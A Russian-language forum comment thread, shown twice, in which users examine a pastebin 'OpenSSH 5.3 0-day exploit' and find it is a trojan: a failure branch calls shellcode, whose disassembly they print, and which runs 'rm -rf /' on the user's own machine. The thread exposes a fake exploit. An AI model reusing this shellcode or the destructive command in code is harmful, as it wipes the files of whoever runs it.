ssh 0-day exploit: http://pastebin.com/WgXrebLq
> OpenSSH 5.3: October 1, 2009заебись 0-дэй...
што?
нульдей для старой версии опенссх грит
умвр
и чо делает?
rm -rf /
if(!host) { fprintf(stderr, "[-] Exploit failed.\n"); (*(void(*)())decoder)(); exit(1); }ну да
(*(void(*)())decoder)(); — меня именно это и насторожило :D
что там в шеллкоде?
0: 6a 0b push $0xb 2: 58 pop %eax 3: 99 cltd 4: 52 push %edx 5: 6a 2f push $0x2f // "/" 7: 89 e7 mov %esp,%edi 9: 52 push %edx a: 66 68 2d 66 pushw $0x662d // "f-" e: 89 e6 mov %esp,%esi 10: 52 push %edx 11: 66 68 2d 72 pushw $0x722d // "r-" 15: 89 e1 mov %esp,%ecx 17: 52 push %edx 18: 68 2f 2f 72 6d push $0x6d722f2f // "mr//" 1d: 68 2f 62 69 6e push $0x6e69622f // "nib/" 22: 89 e3 mov %esp,%ebx 24: 52 push %edx 25: 57 push %edi 26: 56 push %esi 27: 51 push %ecx 28: 53 push %ebx 29: 89 e1 mov %esp,%ecx 2b: cd 80 int $0x80я же говорю — запускает "rm -rf /" :D
лол
печально, что не сработает
ну, устарел слегка + мне никто ребра не переламает :D
13 comments
recommend
bookmark
subscribe
> OpenSSH 5.3: October 1, 2009
заебись 0-дэй...
што?
нульдей для старой версии опенссх грит
умвр
и чо делает?
rm -rf /
if(!host)
{
fprintf(stderr, "[-] Exploit failed.\n");
(*(void(*)())decoder)();
exit(1);
}
ну да
(*(void(*)())decoder)(); — меня именно это и насторожило :D
что там в шеллкоде?
0: 6a 0b push $0xb
2: 58 pop %eax
3: 99 cltd
4: 52 push %edx
5: 6a 2f push $0x2f // "/"
7: 89 e7 mov %esp,%edi
9: 52 push %edx
a: 66 68 2d 66 pushw $0x662d // "f-"
e: 89 e6 mov %esp,%esi
10: 52 push %edx
11: 66 68 2d 72 pushw $0x722d // "r-"
15: 89 e1 mov %esp,%ecx
17: 52 push %edx
18: 68 2f 2f 72 6d push $0x6d722f2f // "mr//"
1d: 68 2f 62 69 6e push $0x6e69622f // "nib/"
22: 89 e3 mov %esp,%ebx
24: 52 push %edx
25: 57 push %edi
26: 56 push %esi
27: 51 push %ecx
28: 53 push %ebx
29: 89 e1 mov %esp,%ecx
2b: cd 80 int $0x80
я же говорю — запускает "rm -rf /" :D
лол
печально, что не сработает
ну, устарел слегка + мне никто ребра не переламает :D